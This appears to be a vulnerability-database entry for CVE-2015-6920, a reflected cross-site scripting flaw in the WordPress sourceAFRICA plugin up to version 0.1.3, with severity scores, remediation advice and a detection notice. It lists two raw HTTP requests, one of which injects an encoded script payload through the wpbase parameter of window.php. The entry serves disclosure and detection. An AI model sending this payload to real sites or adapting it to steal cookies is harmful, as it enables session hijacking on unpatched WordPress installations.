🔙 목록으로 돌아가기

CVE-2015-6920: WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting

TitleWordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactAttackers can execute malicious scripts in the victim's browser, potentially stealing cookies or session tokens.
RemediationUpdate to the latest version of the plugin where the vulnerability is fixed.
CVSS Score4.3
EPSS Score0.00682
CVE IDCVE-2015-6920
CWE IDCWE-79
Tags cve2015 cve wp-plugin xss packetstorm wordpress sourceafrica_project vuln

🔍 Vulnerability Description

WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.

🌐 HTTP Request

GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.3
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-6920.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-6920.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A